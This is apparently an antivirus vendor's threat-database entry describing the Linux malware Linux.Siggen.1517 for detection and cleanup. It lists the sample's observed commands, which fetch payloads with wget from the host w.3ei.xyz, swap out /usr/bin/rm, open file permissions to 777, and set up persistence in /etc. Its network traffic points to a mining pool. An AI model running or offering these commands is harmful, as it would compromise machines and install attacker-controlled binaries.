Library
My library

+ Add to library

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

Your tickets

Profile

Linux.Siggen.1517

Added to the Dr.Web virus database: 2019-03-17

Virus description added:

Technical Information

Malicious functions:
Launches itself as a daemon
Launches processes:
  • sh -c echo 123 > /etc/velog
  • sh -c wget -P /etc -t 3 --quiet -T 20 http://w.3ei.xyz:43768/pvds2
  • wget -P /etc -t 3 --quiet -T 20 http://w.3ei.xyz:43768/pvds2
  • sh -c mv /etc/pvds2 /etc/pvds
  • mv /etc/pvds2 /etc/pvds
  • sh -c wget -P /etc -t 3 --quiet -T 20 http://w.3ei.xyz:43768/httpdz
  • wget -P /etc -t 3 --quiet -T 20 http://w.3ei.xyz:43768/httpdz
  • sh -c chmod 777 /etc/httpdz
  • chmod 777 /etc/httpdz
  • sh -c wget -P /etc -t 3 --quiet -T 20 http://w.3ei.xyz:43768/migrations
  • wget -P /etc -t 3 --quiet -T 20 http://w.3ei.xyz:43768/migrations
  • sh -c chmod 777 /etc/migrations
  • chmod 777 /etc/migrations
  • sh -c chattr -ia /usr/bin/rm
  • chattr -ia /usr/bin/rm
  • sh -c mv /usr/bin/rm /usr/bin/rmm
  • mv /usr/bin/rm /usr/bin/rmm
  • sh -c wget -P /usr/bin -t 3 --quiet -T 20 http://w.3ei.xyz:43768/rm
  • wget -P /usr/bin -t 3 --quiet -T 20 http://w.3ei.xyz:43768/rm
  • sh -c chmod 777 /usr/bin/rm
  • chmod 777 /usr/bin/rm
  • sh -c cp <SAMPLE_FULL_PATH> /etc/initdz
  • cp <SAMPLE_FULL_PATH> /etc/initdz
  • sh -c chmod 777 /etc/initdz
  • chmod 777 /etc/initdz
  • sh -c echo divg > /etc/rzx
  • sh -c ps -fe|grep divg |grep -v grep|grep -v defunct
  • grep divg
  • grep -v grep
  • ps -fe
  • grep -v defunct
  • sh -c cp /etc/pvds /etc/divg
  • cp /etc/pvds /etc/divg
  • sh -c chmod 777 /etc/divg
  • chmod 777 /etc/divg
  • divg
  • sh -c curl --connect-timeout 10 --max-time 30 --retry 3 icanhazip.com
  • sh -c url --connect-timeout 10 --max-time 30 --retry 3 icanhazip.com
  • sh -c ps -fe|grep migrations |grep -v grep|grep -v defunct
  • grep migrations
Performs operations with the file system:
Modifies file access rights:
  • /etc/httpdz
  • /etc/migrations
  • /usr/bin/rm
  • /etc/initdz
  • /etc/divg
Creates or modifies files:
  • /etc/velog
  • /etc/pvds2
  • /etc/httpdz
  • /etc/migrations
  • /usr/bin/rm
  • /etc/initdz
  • /etc/rzx
  • /etc/divg
Network activity:
Establishes connection:
  • <LOCAL_DNS_SERVER>
  • 47.###.190.245:13531
HTTP GET requests:
  • w.###.#yz:43768/pvds2
  • w.###.#yz:43768/httpdz
  • w.###.##z:43768/migrations
  • w.###.xyz:43768/rm
DNS ASK:
  • w.##i.xyz
  • xm#.#2pool.com
Sends data to the following servers:
  • 47.###.190.245:13531
Receives data from the following servers:
  • 47.###.190.245:13531
Other:
Collects CPU information
Collects RAM information
Collects information about network activity

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number